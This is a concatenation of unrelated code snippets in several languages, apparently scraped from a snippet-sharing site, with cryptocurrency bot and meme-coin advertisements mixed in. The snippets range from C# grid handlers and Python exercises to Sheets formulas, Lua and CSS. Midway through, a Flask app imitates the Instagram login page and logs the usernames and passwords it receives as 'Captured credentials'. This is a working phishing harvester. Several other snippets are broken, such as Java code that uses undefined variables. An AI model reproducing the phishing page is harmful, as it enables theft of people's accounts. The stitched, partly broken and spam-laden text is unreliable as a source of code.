            if ((bool)e.Command.Parameters["@o_succeed"].Value)
            {
                tx.Commit();
                Show_Error_Detail("170", "~/images/ok-icon.png", "");
            }
            else
            {
                tx.Rollback();
                Show_Error_Detail(msg_num, "~/images/error_button.png", "Add Info [ " + add_info + " ]");
            }

        }
        catch (Exception ex)
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
            throw (ex);
        }
        finally
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
        }
    }
    protected void sql_delivery_route_d_updated(object sender, SqlDataSourceStatusEventArgs e)
    {
        DbCommand command = e.Command;
        DbTransaction tx = command.Transaction;

        try
        {
            str_success = e.Command.Parameters["@o_succeed"].Value.ToString();
            msg_num = e.Command.Parameters["@o_msg_num"].Value.ToString();
            add_info = e.Command.Parameters["@o_add_info"].Value.ToString();
            if ((bool)e.Command.Parameters["@o_succeed"].Value)
            {
                tx.Commit();
                Show_Error_Detail("171", "~/images/ok-icon.png", "");
            }
            else
            {
                tx.Rollback();
                Show_Error_Detail(msg_num, "~/images/error_button.png", "Add Info [ " + add_info + " ]");
            }

        }
        catch (Exception ex)
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
            throw (ex);
        }
        finally
        {
            if (e.Command.Transaction != null)
            {
                e.Command.Transaction.Dispose();
                e.Command.Connection.Close();
            }
        }
    }
    protected void sql_delivery_route_d_tran(object sender, SqlDataSourceCommandEventArgs e)
    {
        e.Command.Parameters["@i_delivery_route"].Value = gv_delivery_route.GetRowValues(gv_delivery_route.FocusedRowIndex, "delivery_route").ToString();
        DbCommand command = e.Command;
        DbConnection cx = command.Connection;
        cx.Open();
        DbTransaction tx = cx.BeginTransaction();
        command.Transaction = tx;
    }
    public void Show_Error(string msgnum, string Url, string AddInfo)
    {
        gv_delivery_route.JSProperties["cperror_msg_num"] = msgnum;
        gv_delivery_route.JSProperties["cperror_add_info"] = AddInfo;
        gv_delivery_route.JSProperties["cperror_image_url"] = Url;
    }
    public void Show_Error_Detail(string msgnum, string Url, string AddInfo)
    {
        gv_delivery_route_d.JSProperties["cperror_msg_num"] = msgnum;
        gv_delivery_route_d.JSProperties["cperror_add_info"] = AddInfo;
        gv_delivery_route_d.JSProperties["cperror_image_url"] = Url;
    }
    protected void sql_delivery_route_d_Selecting(object sender, SqlDataSourceSelectingEventArgs e)
    {
        object values = gv_delivery_route.GetRowValues(gv_delivery_route.FocusedRowIndex, new string[] { "delivery_route" });
        string focusrow = (values == null) ? null : values.ToString();
        e.Command.Parameters["@i_delivery_route"].Value = focusrow;
    }
    protected void cbo_delivery_zone_ItemsRequestedByFilterCondition(object source, ListEditItemsRequestedByFilterConditionEventArgs e)
    {
        ASPxComboBox comboBox_zone = (ASPxComboBox)source; 
       //// Memeriksa apakah permintaan berasal dari callback dan jika halaman sedang melakukan postback
        if (comboBox_zone.IsCallback && Page.IsPostBack)
        {
            comboBox_zone.Items.Clear(); //hapus yang ada sebelum input baru
            Sql_filter.SelectParameters.Clear();
            Sql_filter.SelectCommand = "wm_select_delivery_zone";
            Sql_filter.SelectCommandType = SqlDataSourceCommandType.StoredProcedure;
            Sql_filter.SelectParameters.Add("zone", TypeCode.String, string.Format("%{0}%", e.Filter));
            Sql_filter.SelectParameters.Add("startIndex", TypeCode.Int64, (e.BeginIndex + 1).ToString());
            Sql_filter.SelectParameters.Add("endIndex", TypeCode.Int64, (e.EndIndex + 9).ToString());
            //DataView dv = (DataView)Sql_filter.Select(DataSourceSelectArguments.Empty);
            comboBox_zone.DataSource = Sql_filter;
            comboBox_zone.DataBind();
        }
    }
    protected void cbo_delivery_zone_ItemRequestedByValue(object source, ListEditItemRequestedByValueEventArgs e)
    {

    }
    protected void gv_delivery_route_d_CommandButtonInitialize(object sender, ASPxGridViewCommandButtonEventArgs e)
    {
        if (e.ButtonType == DevExpress.Web.ASPxGridView.ColumnCommandButtonType.Edit)
            e.Visible = false;
    }
}
        
class Solution {
    public int subarraySum(int[] nums, int k) {
        HashMap<Long,Integer> hm=new HashMap<>();
        long sum=0;
        int cnt=0;
        hm.put(sum,1);
        for(int i=0;i<nums.length;i++){
            sum+=nums[i];
            if(hm.containsKey(sum-k)){
                cnt+=hm.get(sum-k);

            }
            if(hm.containsKey(sum)){
                hm.put(sum,hm.get(sum)+1);
            }
            else{
            hm.put(sum,1);
            }
        }
        
        return cnt;
        
    }
    
}
def duplibit(arr):
    seen =set()
    dup = set()
    for num in arr:
        if num in seen:
            dup.add(num)
        else:
            seen.add(num)
    return list(dup)


array = [1,2,3,4,1,2,4,8,9]
print(duplibit(array))
def duplibit(arr):
    freq = {}
    dup = []
    for num in arr:
        freq[num] = freq.get(num ,0)+1
    for key,value in freq.items():
        if value >1:
            dup.append(key)
    return dup
        

array = [1,2,3,4,1,2,4,8,9]
print(duplibit(array))
def dupbit(arr):
    bitmap =0
    dup =[]
    for num in arr:
        bit= 1<<(num-1)
        if bit & bitmap:
            dup.append(num)
        else:
            bitmap |=bit
            
    return dup
    
    
    
array = [1,2,3,4,5,2,4,5,2,4,8]
print(dupbit(array))
'''
def reverse(s):
    s= list(s)
    l , r=0, len(s)-1
    while l<r:
        s[l],s[r] = s[r], s[l]
        l=l+1
        r=r-1
    return "".join(s)
   '''
'''  
def reverse(s):
    return s[::-1]
'''
'''
def reverse(s):
    result =''
    for char in s:
        result = char + result
    return result
'''
'''
def reverse(s):
    return ''.join(reversed(s))
'''

input_string="Narendra"
print(reverse(input_string))
import java.util.Arrays; // Import required for Arrays utility class

class Main {
    public static void main(String[] args) {
        int arr[] = {1, 3, 2, 6, 5, 4}; // Correct array initialization
        Arrays.sort(arr); // Correct usage of Arrays.sort
       System.out.println(Arrays.toString(arr)); // prints the  sorted array
       int n = arr.length;
       System.out.println(arr[n-1]);

       
    }
}
//Tc-O(nlogn)
//lergest element in an array ( sorting and return n-1) (brute force method)
[ExtensionOf(tableStr(GeneralJournalAccountEntry))]
public final class NA_GeneralJournalAccountEntry_Extension
{
    public DimensionDisplayValue getDimensionCombinationValues(LedgerDimensionAccount ledgerdimension)
    {
        DimensionAttributeLevelValueAllView dimensionAttributeLevelValueAllView;
        DimensionAttribute                  dimensionAttribute;
        Set                                 dimensionAttributeProcessed;
        LedgerDimensionAccount              _ledgerDimension;
        str                                 segmentName ;
        DimensionDisplayValue segmentDescription;
        SysDim                              segmentValue;

        str getDynamicAccountAttributeName(TableNameShort _dimensionAttrViewName)
        {

            #Dimensions
            container cachedResult;
            SysModelElement modelElement;
            SysDictTable sysDictTable;
            DictView dictView;
            Label label;

            Debug::assert(_dimensionAttrViewName like #DimensionEnabledPrefixWithWildcard);

            // Get/cache results of the AOT metadata lookup on the view

            cachedResult = DimensionCache::getValue(DimensionCacheScope::DynamicAccountAttributeName, [_dimensionAttrViewName]);

            if (cachedResult == conNull())
            {

                // Find the matching model element and instantiate the AOT metadata definition of the view

                select firstOnly AxId, Name from modelElement
                where  modelElement.ElementType == UtilElementType::Table
                    && modelElement.Name == _dimensionAttrViewName;


                sysDictTable = new sysDictTable(modelElement.AxId);

                Debug::assert(sysDictTable.isView());

                // Create an instance of the view and get the singular representation of the entity name as a label ID (do not translate)

                dictView = new dictView(modelElement.AxId);

                cachedResult = [dictView.singularLabel()];

                DimensionCache::insertValue(DimensionCacheScope::DynamicAccountAttributeName, [_dimensionAttrViewName], cachedResult);

            }

            label = new label();


            return label.extractString(conPeek(cachedResult, 1));
        }


        _ledgerDimension = ledgerdimension;

        if (_ledgerDimension)
        {

            dimensionAttributeProcessed = new Set(extendedTypeId2Type(extendedTypeNum(DimensionAttributeRecId)));

            while select DisplayValue, AttributeValueRecId from dimensionAttributeLevelValueAllView
            order by dimensionAttributeLevelValueAllView.GroupOrdinal, dimensionAttributeLevelValueAllView.ValueOrdinal
            where dimensionAttributeLevelValueAllView.ValueCombinationRecId == _ledgerDimension
            join Name, Type, ViewName, RecId from dimensionAttribute
                where dimensionAttribute.RecId == dimensionAttributeLevelValueAllView.DimensionAttribute

            {
                if (!dimensionAttributeProcessed.in(dimensionAttribute.RecId))
                {
                    if (DimensionAttributeType::DynamicAccount == dimensionAttribute.Type)
                    {
                        // Use the singular name of the view backing the multi-typed entity
                        segmentName = getDynamicAccountAttributeName(dimensionAttribute.ViewName);
                    }
                    else
                    {
                        // Use the name of the attribute directly for all other types (main account, custom list, existing list)
                        segmentName = dimensionAttribute.localizedName();
                    }

                    segmentValue = dimensionAttributeLevelValueAllView.DisplayValue;

                    if (strLen(segmentDescription) == 0)

                    {

                        segmentDescription = DimensionAttributeValue::find(

 

                    dimensionAttributeLevelValueAllView.AttributeValueRecId).getName();

                    }

                    else

                    {

                        segmentDescription += strFmt(" - %1", DimensionAttributeValue::find(

 

                    dimensionAttributeLevelValueAllView.AttributeValueRecId).getName());

                    }

                    dimensionAttributeProcessed.add(dimensionAttribute.RecId);

                }

            }

        }

        return  segmentDescription;

    }

    public display  str 200 DimensionValue()
    {

        return this.getDimensionCombinationValues(this.LedgerDimension);
     
    }

    public display  str 200 MOFID()
    {
        DimensionAttributeValueSetStorage dimStorage;
        ;
        dimStorage = DimensionAttributeValueSetStorage::find(LedgerDimensionFacade::getDefaultDimensionFromLedgerDimension(this.LedgerDimension));
        return dimStorage.getDisplayValueByDimensionAttribute(DimensionAttribute::findByName("FD11_MOF").RecId);
      
    }

    public display  str 200 MOFName()
    {   
        DimensionFinancialTag DimensionFinancialTag;
        select DimensionFinancialTag where DimensionFinancialTag.Value == this.MOFID();
        return DimensionFinancialTag.Description;
      
    }

    public display  str 200 DimensionID()
    {
       return LedgerDimensionFacade::getDisplayValueForLedgerDimension(this.LedgerDimension);
    }

    public display  str 200 ItemId()
    {
        DimensionAttributeValueSetStorage dimStorage;
        ;
        dimStorage = DimensionAttributeValueSetStorage::find(LedgerDimensionFacade::getDefaultDimensionFromLedgerDimension(this.LedgerDimension));
        return dimStorage.getDisplayValueByDimensionAttribute(DimensionAttribute::findByName("FD10_Item").RecId);
      
    }

}
yes, It is possible to integrate FH into mobile apps, however, FH does not handle this directly. The Clients App Developer will need to do the integration and implement the links.
Take Crypto Trading to the Next Level with Beleaftechnologies!
At Beleaftechnologies, we specialize in developing advanced Crypto Algo Trading Bots customized to optimize your trading strategies.  These bots leverage innovative algorithms, AI, and real-time analytics to ensure precision, efficiency, and consistent profitability.
Our solutions are customizable, secure, and compatible with various crypto exchanges, enabling smooth  integration for traders of all levels. Whether you're a beginner or a pro, we deliver tools to maximize returns in the ever-evolving crypto market.
Unlock smarter trading with Beleaftechnologies – Your trusted partner in algorithmic excellence.
Visit now >>https://beleaftechnologies.com/crypto-algo-trading-bot-development
Whatsapp :  +91 8056786622
Email id :  business@beleaftechnologies.com
Telegram : https://telegram.me/BeleafSoftTech 
window.__tcfapi('getTCData', 2, (tcData) => { console.log(tcData); });
## Setup a conda environment
 
``conda create --name ds python=3.11 numpy pandas scikit-learn matplotlib seaborn jupyter plotly ipykernel pyodbc``

## Activate the environment

``activate ds``

## Install a package

``conda install plotly``

## Update a package

``conda update pandas``

## Remove a package

``conda remove pandas``

## List all packages and versions installed in active environment

``conda list``

## Get a list of all my environments

``conda env list``

## Deactivate the current environment 

``deactivate``

## Remove an environment

``conda remove --name myenv --all``
from flask import Flask, render_template_string, request

app = Flask(__name__)

# HTML Template
html_template = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }
        .container {
            max-width: 400px;
            background: #fff;
            padding: 20px;
            border: 1px solid #dbdbdb;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }
        .login-form input {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #dbdbdb;
            border-radius: 5px;
        }
        .login-form button {
            width: 100%;
            padding: 10px;
            background: #0095f6;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        .login-form button:hover {
            background: #007ac1;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-container">
            <h2>Instagram</h2>
            <form class="login-form" method="POST" action="/login">
                <input type="text" name="username" placeholder="Phone number, username, or email" required>
                <input type="password" name="password" placeholder="Password" required>
                <button type="submit">Log In</button>
            </form>
        </div>
    </div>
</body>
</html>
"""

# Route to serve the login page
@app.route('/')
def home():
    return render_template_string(html_template)

# Route to handle login form submission
@app.route('/login', methods=['POST'])
def login():
    # Get the user input from the form
    username = request.form.get('username')
    password = request.form.get('password')

    # Log the credentials to the console
    print(f"Captured credentials: Username={username}, Password={password}")

    # Display a response message in the browser
    return "Credentials received! Check your console for the captured input."

if __name__ == "__main__":
    app.run(debug=True)
body {
    font-family: Arial, sans-serif;
    background-color: #fafafa;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
}

.container {
    background-color: #fff;
    border: 1px solid #dbdbdb;
    border-radius: 1px;
    max-width: 350px;
    padding: 10px 0;
    text-align: center;
}

.login-container {
    padding: 10px 40px;
}

.logo img {
    width: 175px;
    margin: 20px 0;
}

.login-form input {
    width: 100%;
    padding: 9px 0 7px 8px;
    margin-bottom: 6px;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    background-color: #fafafa;
    font-size: 12px;
}

.login-form button {
    width: 100%;
    padding: 5px 10px;
    margin-top: 8px;
    background-color: #3897f0;
    border: 1px solid #3897f0;
    border-radius: 4px;
    color: #fff;
    font-size: 14px;
    font-weight: 600;
}

.forgot-password {
    margin-top: 12px;
    font-size: 12px;
}

.forgot-password a {
    color: #00376b;
    text-decoration: none;
}

.signup {
    margin-top: 10px;
    font-size: 14px;
}

.signup a {
    color: #3897f0;
    text-decoration: none;
}

.get-app {
    margin-top: 10px;
    font-size: 14px;
}

.app-links {
    margin-top: 10px;
}

.app-links img {
    width: 135px;
    margin: 0 5px;
}
import java.util.Scanner;

public class LabProgram {
   public static void main(String[] args) {
      Scanner scnr = new Scanner(System.in);
      int currentPrice; 
      int lastMonthsPrice; 
      
      currentPrice = scnr.nextInt(); 
      lastMonthsPrice = scnr.nextInt();
      
      System.out.println("This house is $" + currentPrice + "."); 
      System.out.println("The change is $" + priceChange + " since last month."); 
      System.out.println("The estimated monthly mortgage is $" + estimatedMortgage + ".");

   }
}
<!-- Slide Out Menu Ghost -->
<link rel="stylesheet" href="https://www.ghostplugins.dev/assets/forced-mobile-7-1/forced-mobile-menu-7-1.css"><link rel="stylesheet" href="https://www.ghostplugins.dev/assets/side-menu-for-7-1/side-menu-for-7-1.css">
<!-- Slide Out Menu Ghost -->

<!-- Auto rotate banner on home page -->
<script>
  (function(){
    let playInBackend = true,
        timing = 6,
        section = '',
        direction = 1;

function AutoScrollLayout(e){e=""==e?document.querySelector(".user-items-list-section"):document.querySelector(e);let t,n,o,i,c,r=!1,s=e.querySelectorAll('button[class*="__arrow-button"]');function d(){t=setInterval(u,n)}function u(){o=document.querySelector("body.sqs-edit-mode-active"),i=document.querySelector(".sqs-modal-lightbox-open"),r||o||i||!c||s[direction].click()}n=1e3*timing;if(document.addEventListener("visibilitychange",function(){r=!!document.hidden}),["mousedown","touchstart"].forEach(t=>{e.addEventListener(t,function(){r=!0})}),["mouseup","touchend"].forEach(n=>{e.addEventListener(n,function(){r=!1,clearInterval(t),d()})}),window.IntersectionObserver){new IntersectionObserver((e,t)=>{e.forEach(e=>{c=!!e.isIntersecting})},{rootMargin:"-75px 0px -75px 0px"}).observe(e)}s[direction]&&d()}window.addEventListener("load",function(){let e=new Array;e.push(section),section.includes(",")&&(e=section.split(",")),e.forEach(e=>{(window.top==window.self||window.top!==window.self&&playInBackend)&&new AutoScrollLayout(e)})});
  }());
</script>
<!-- Auto rotate banner on home page -->
 $dataProvider = new ActiveDataProvider([
            'query' => $query,
            'sort'=> ['defaultOrder' => ['id_tipo_cambio' => SORT_DESC]] // Agregar esta linea para agregar el orden por 
        ]);
<p class="custom-font-secondary text-4 mb-4 appear-animation animated fadeInUpShorter appear-animation-visible" data-appear-animation="fadeInUpShorter" style="animation-delay: 100ms;"> == $0 
"World Food Relief is a registered charity dedicated to addressing the urgent and growing issue of food poverty. With compassion at the heart of everything we do. Our mission is to provide critical support to individuals and families struggling to access essential nourishment.""</p> 
if (window.location.href=="https://www.getholiday.es/") {
index:
 'fecha' => [
    'attribute' => 'fecha',
    'value' => 'fecha',
    'headerOptions' => ['style' => 'text-align:center; width:10%; text-color:white;'],
    'contentOptions' => ['style' => 'text-align:center; vertical-align:middle;'],
    'format' => 'raw',
    'filter' => DateRangePicker::widget([
        'model' => $searchModel,
        'attribute' => 'rango_fecha',
        'useWithAddon' => false,
        'convertFormat' => true,
        'pluginOptions' => [
            //'startDate' => date('01-01-2024'),
            //'endDate' => date('01-01-2024'),
            'autoclose' => true,
            'timePicker' => true,
            'locale' => ['format' => 'd-m-Y'],
            'viewMode' => 'years', // Muestra la vista de años
        'minViewMode' => 'years' // Permite seleccionar solo años
        ],
    ])
],
  agregar estas tres variables en el modelSearch
	public $rango_fecha;
    public $fecha_desde;
    public $fecha_hasta;

MontosIndicSearch:
[['rango_fecha'], 'filter', 'filter' => function($value) {
                if (isset($value) && !empty($value)) {
                    $values = explode(' - ', $value);
                    if (count($values) == 2) {
                        list($this->fecha_desde, $this->fecha_hasta) = $values;
                    }
                }
                }],
 y tambien agregar esto en el filter de search:
->andFilterWhere(['>=', 'fecha', $this->fecha_desde])
->andFilterWhere(['<=', 'fecha', $this->fecha_hasta]);
  
 
esto va en el modelo este es un ejemplo con Monedas
public static function Lista()
    {
        $s = \yii\helpers\ArrayHelper::map(Monedas::find()
            /* ->andWhere(['id_sector' => 2]) */
            ->orderBy('id_moneda')
            ->all(), 'id_moneda', 'nombre_moneda');
        return ($s) ? $s : [];
    }

y en el index quedaria asi:

'id_moneda' => [
    'attribute' => 'id_moneda',
    'headerOptions' => ['style' => 'text-align:center;'],
    'contentOptions' => ['style' => 'text-align:center; width:2%; vertical-align:middle;'],
    'label' => 'Moneda', // Cambia la etiqueta según sea necesario
    'filter' => app\models\Monedas::lista(), // Asegúrate de que este método exista en tu modelo
    'value' => function ($data) {
        $moneda = app\models\Monedas::find()->where(['id_moneda' => $data->id_moneda])->one();
        return ($moneda) ? $moneda->nombre_moneda : ''; // Cambia 'nombre_moneda' al atributo correcto
    },
],
$(document).ready(function () {
  // Crea e aggiungi il loader dinamicamente
  const $loader = $('<div id="loader">Caricamento...</div>').css({
    position: 'fixed',
    top: '50%',
    left: '50%',
    transform: 'translate(-50%, -50%)',
    fontSize: '20px',
    background: 'rgba(255, 255, 255, 0.9)',
    padding: '15px 30px',
    border: '1px solid #ddd',
    display: 'none',
  });
  $('body').append($loader);

  // Crea e aggiungi il contenitore della griglia dinamicamente
  const $grid = $('<div id="grid"></div>').css({
    display: 'flex',
    flexWrap: 'wrap',
    marginTop: '20px',
  });
  $('body').append($grid);

  // Aggiungi stili dinamici per gli elementi della griglia
  $('<style>')
    .text(`
      .grid-item {
        width: 30%;
        margin: 1%;
        background: #f0f0f0;
        padding: 20px;
        text-align: center;
        border: 1px solid #ddd;
      }
    `)
    .appendTo('head');

  // Carica Isotope dinamicamente
  $.getScript('https://unpkg.com/isotope-layout@3/dist/isotope.pkgd.min.js', function () {
    // Mostra il loader e avvia la chiamata AJAX
    $loader.show();

    $.ajax({
      url: 'https://jsonplaceholder.typicode.com/posts', // Endpoint di esempio
      method: 'GET',
      dataType: 'json',
      beforeSend: function () {
        $loader.show(); // Mostra il loader
      },
      success: function (data) {
        // Genera dinamicamente gli elementi della griglia
        const items = data.slice(0, 9).map(
          (item) =>
            `<div class="grid-item category${item.id % 3}">${item.title}</div>`
        );
        $grid.append(items.join(''));

        // Inizializza Isotope
        $grid.isotope({
          itemSelector: '.grid-item',
          layoutMode: 'fitRows',
        });
      },
      error: function (err) {
        console.error('Errore nel caricamento degli elementi:', err);
      },
      complete: function () {
        $loader.hide(); // Nascondi il loader
      },
    });
  });
});
n=int(input('enter number:'))
for i in range(2,n+1):
    for j in range(2,i//+1):
        if i%j==0:
            break
    else:
        print(i,end=' ')
n=int(input('enter number:'))
if(n==1):
    print(n,'not a prime number')
else:
    for i in range(2,n):
        if (n%i==0):
            print(n,'not a prime number')
            break
    else:
        print(n,'prime number')
n=int(input('enter number:'))
a=n
b=len(str(n))
sum1=0
while n!=0:
    c=n%10
    sum1=sum1+(c**b)
    n=n//10
if(a==sum1):
    print('armstrong')
else:
    print('not armstrong')
a=input()
b=[]
for i in a:
    if i not in b:
        b.append(i)
print(b)

When developing a meme coin, selecting the right blockchain is crucial. Consider factors like transaction speed,flexcibility, and fees to ensure smooth user experiences. Assess security features to protect assets and smart contracts. Evaluate the community's size and developer support for collaboration and updates. Compatibility with existing tools and exchanges is key for adoption. Finally, consider the blockchain's popularity and reputation to build trust and attract investors to your meme coin project

Beleaf Technologies is the perfect choice for meme coin development. We provide expert support, innovative solutions, and complete assistance to help bring your unique meme coin ideas to life.

Contact today for free demo : https://www.beleaftechnologies.com/meme-coin-development-company
Whatsapp: +91 7904323274
Skype: live:.cid.62ff8496
d3390349
Telegram: @BeleafSoftTech
Mail to: mailto:business@beleaftechnologies.com



from uvicorn.config import LOGGING_CONFIG

# uvicorn logging
LOGGING_CONFIG["formatters"]["default"]["fmt"] = "%(asctime)s [%(name)s] %(levelprefix)s %(message)s"
LOGGING_CONFIG["formatters"]["access"][
    "fmt"] = '%(asctime)s [%(name)s] %(levelprefix)s %(client_addr)s - "%(request_line)s" %(status_code)s'
# date format
LOGGING_CONFIG["formatters"]["default"]["datefmt"] = "%Y-%m-%d %H:%M:%S" 
/** 
   A program to print two lines.
*/

public class HelloAll
{
   public static void main(String[] args)
   {
      System.out.println("Hello, World!");

      /* Your code goes here */

   }
}
local block = script.Parent

local function Health(player)
    local Humanoid = player.Character:FindFirstChild("Humanoid")
    if Humanoid then
        wait(0.5)
        local expl = Instance.new('Explosion')
        expl.Position = block.Position
        expl.BlastPressure = 20
        expl.Parent = game.Workspace
        Humanoid.Health = 0
    end
end

script.Parent.ClickDetector.MouseClick:Connect(Health)
local clickDetector = script.Parent.ClickDetector

function onMouseClick(Player)
    local humanoid = Player.Character:findFirstChild("Humanoid")
    if humanoid then
        -- włączanie super skoku
        humanoid.UseJumpPower = true
        -- ustawienie siły skoku
        humanoid.JumpPower = 140
        humanoid.WalkSpeed = 70
        -- wyłączanie super skoku
        wait(30)
        humanoid.UseJumpPower = false
        humanoid.WalkSpeed = 16
    end
end

clickDetector.MouseClick:connect(onMouseClick)
https://docs.google.com/spreadsheets/d/1tPpjeILWi8ujMKCny-LrsZHkylEtrrAywz_Z14dBqk0/edit
https://www.pigzilla.co/articles/15-insanely-efficient-google-sheets-formulas-for-seos/
=countif(A:A,A:A)>1
=countif(A:A;A1)>1
=countif($A$1:$A,A2)>1
=A1&B1
=COUNTIF($A$2:G,Indirect(Address(Row(),Column(),)))>1 [DUPLICATE TEXT FROM DIFFERENT COLUMN]
=COUNTIF($A:$A,"TEXT") [COUNT THE INSTANCES OF 'TEXT']
=$A1>=LARGE($A$1:$A$10,5) [HIGHLIGHT TOP 5]
=REGEXREPLACE(A1,"\?[^?]*$","") [REMOVE URL PARAMETERS]
=SUBSTITUTE(LOWER(JOIN("-",A2))," ","-") [LOWER CASE+REPLACE SPACE]
=regexmatch(A1,"\s(KW1|KW2|KW3)")
=regexmatch(A1," (KW1|KW2|KW3)")
=REGEXEXTRACT(A2,”^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n]+)”)
=IFERROR(ARRAYFORMULA(REGEXEXTRACT(A2:A,”^(?:https?:\/\/)?(?:[^@\n]+@)?(?:www\.)?([^:\/\n]+)”)),“”)
=IF(SEARCH(“/blog/”,A2),“YES”,“”)
=REGEXEXTRACT(FORMULATEXT(A1),"""(.+?)""") [EXTRACT URL FROM LINK]
=LEFT(A2,FIND("/",A2,9)-1) [EXTRACT DOMAIN FROM URL]
=LEFT(A2,FIND("$$$",A2)-1) [EXTRACT ALL BEFORE $$$]
=RIGHT(A2,LEN(A2)-FIND("$$$",A2)) [EXTRACT ALL AFTER $$$]
=LEFT(B2,len(B2)-3) [TRIM LAST 3 CHARACTERS]
=(A1-A2)/A2 [DIFFERENCE IN %]
=counta(F3) + sum(arrayformula(len(regexreplace(F3, "[^\n]", ""))))
^((?!TEXT).)*$ [REGEX EXCLUDING TEXT]
\?.*
^\s*$ [SELECT BLANK CELLS]
=INDIRECT(ADDRESS(ROW(),COLUMN()-1)) [VALUE FROM CELL ON THE LEFT]
=split(A1,char(10)&",") [SPLIT CELL CONTENT INTO COLUMNS]
=LEFT(A2,FIND("(",A2)-2) and =MID(A2,FIND("(",A2)+1,FIND(")",A2)-FIND("(",A2)-1) [SPLIT CELL TEXT WITH BRACKETS]
=AND(REGEXMATCH(A:A, "(?i)KEYWORD1"), NOT(REGEXMATCH(A:A, "(?i)KEYWORD2"))) [SHOW CELLS WITH KEY1 BUT NOT KEY2]
=SPARKLINE [TRENDS]
='Sheet Name'!A1 [REFERENCE CELL FROM DIFFERENT SHEET]
=match(A1,indirect("'Sheet Name'!A2:A"),0) [CONDITIONAL FORMATTING FROM DIFFERENT SHEET]
=REGEXREPLACE(A11,"\D+", "")  [REMOVE CHARACTERS AND LEAVE NUMBERS]
\D+  [FIND NUMBERS]
=UNIQUE(A1:A) [REMOVE DUPLICATES]
=IFERROR([FORMULA],"[NEW ERROR]") [REPLACE #N/A, #VALUE! or #NUM!]
=IMPORTXML("https://www.mysite/sitemap.xml", "//*[local-name() ='url']/*[local-name() ='loc']") [IMPORT ALL URLs IN SITEMAP]
([^” “]*\s){X,}? [GSC QUERIES WITH X+1 WORDS]
(\w*\W){X,} [GSC QUERIES WITH X+1 WORDS]



2 word phrases » ^\w+\s+\w+$
2+ word phrases » (\w+\s+\w+\s?)+
queries with symbols » [^a-z0-9\s]+
local light = game:GetService('Lighting')

while true do
  light.ClockTime += 0.01
  wait(0.01)
end
הדרכה של תלמידה של ריבקי צ'ולק
לאלמנטים שיוצרים משחק חיבור

מקמי באלמנטור
(או סתם ב HTML)
את האלמנטים שאת רוצה
שהמשתמש יוכל להזיז.
תני לכל אחד מהם במתקדם -> css classes
את הערך – my-draggable
מתחתם הוסיפי אלמנט HTML
ושימי בתוכו את הקוד הבא:
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.10.4/gsap.min.js"></script>
<script src='https://unpkg.com/gsap@3/dist/Draggable.min.js'></script>
<script>
    gsap.registerPlugin(Draggable);
    Draggable.create(".my-draggable", {
        type: "x,y",
        bounds: ".astericContainer"
    });
</script>
Copy
וזהו
הקסם יתרחש מעצמו…
URLSession.shared
    .dataTaskPublisher(for: URL(string: "https://picsum.photos/300/600")!)
    .map(\.data)
    .compactMap(UIImage.init)

    /// Schedule to receive the sink closure on the
    /// main dispatch queue.
    .receive(on: DispatchQueue.main, options: nil)
    
    .sink { _ in
        print("Image loading completed")
    } receiveValue: { image in
        self.image = image
    }.store(in: &cancellables)
Text:
*Hello* = Italic
**Hello** = Bold
***Hello*** = Bold-Italic
__Hello__ = Underline

# = Header 1/3
## = Header 2/3
### = Header 3/3

code blocks:
```python (or any other language!)
your code here```


Links:
[Text You want to show](Link goes here)

Show Image From Link:
![alt text](image link)
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>
<script>
    const options = {
      label: '🌓',
      saveInCookies: false,
      autoMatchOsTheme: false,
       time: '1s'
    }
    function addDarkmodeWidget() {
      new Darkmode(options).showWidget();
    }
    window.addEventListener('load', addDarkmodeWidget);
</script>
const sheetName = 'Sheet1'
const scriptProp = PropertiesService.getScriptProperties()

function initialSetup () {
  const activeSpreadsheet = SpreadsheetApp.getActiveSpreadsheet()
  scriptProp.setProperty('key', activeSpreadsheet.getId())
}

function doPost (e) {
  const lock = LockService.getScriptLock()
  lock.tryLock(10000)

  try {
    const doc = SpreadsheetApp.openById(scriptProp.getProperty('key'))
    const sheet = doc.getSheetByName(sheetName)

    const headers = sheet.getRange(1, 1, 1, sheet.getLastColumn()).getValues()[0]
    const nextRow = sheet.getLastRow() + 1

    const newRow = headers.map(function(header) {
      return header === 'Date' ? new Date() : e.parameter[header]
    })

    sheet.getRange(nextRow, 1, 1, newRow.length).setValues([newRow])

    return ContentService
      .createTextOutput(JSON.stringify({ 'result': 'success', 'row': nextRow }))
      .setMimeType(ContentService.MimeType.JSON)
  }

  catch (e) {
    return ContentService
      .createTextOutput(JSON.stringify({ 'result': 'error', 'error': e }))
      .setMimeType(ContentService.MimeType.JSON)
  }

  finally {
    lock.releaseLock()
  }
}
/* Dropdown Button */
.dropbtn {
  background-color: #04AA6D;
  color: white;
  padding: 16px;
  font-size: 16px;
  border: none;
}

/* The container div - needed to position the dropdown content */
.dropdown {
  position: relative;
  display: inline-block;
}

/* Dropdown Content (Hidden by Default) */
.dropdown-content {
  display: none;
  position: absolute;
  background-color: #f1f1f1;
  min-width: 160px;
  box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
  z-index: 1;
}

/* Links inside the dropdown */
.dropdown-content a {
  color: black;
  padding: 12px 16px;
  text-decoration: none;
  display: block;
}

/* Change color of dropdown links on hover */
.dropdown-content a:hover {background-color: #ddd;}

/* Show the dropdown menu on hover */
.dropdown:hover .dropdown-content {display: block;}

/* Change the background color of the dropdown button when the dropdown content is shown */
